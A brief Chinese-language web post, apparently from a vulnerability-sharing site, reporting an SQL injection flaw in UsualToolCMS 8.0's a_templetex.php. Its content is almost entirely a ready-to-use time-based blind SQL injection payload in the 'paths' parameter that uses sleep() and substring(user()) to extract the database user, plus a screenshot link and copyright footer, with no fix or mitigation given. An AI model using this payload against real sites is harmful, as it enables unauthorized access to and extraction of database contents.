# UsualToolCMS-8.0 a_templetex.php sql注入漏洞
payload:
“`
a_templetex.php?t=open&id=1&paths=templete/index’ where id=1 and if(ascii(substring(user(),1,1))>0,sleep(5),1)–+
“`
![image.png](/static/qingy/UsualToolCMS-8.0_a_templetex.php_sql注入漏洞/img/1600850751098-fc38e94b-e10c-4844-bf78-9162a9fccd47.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容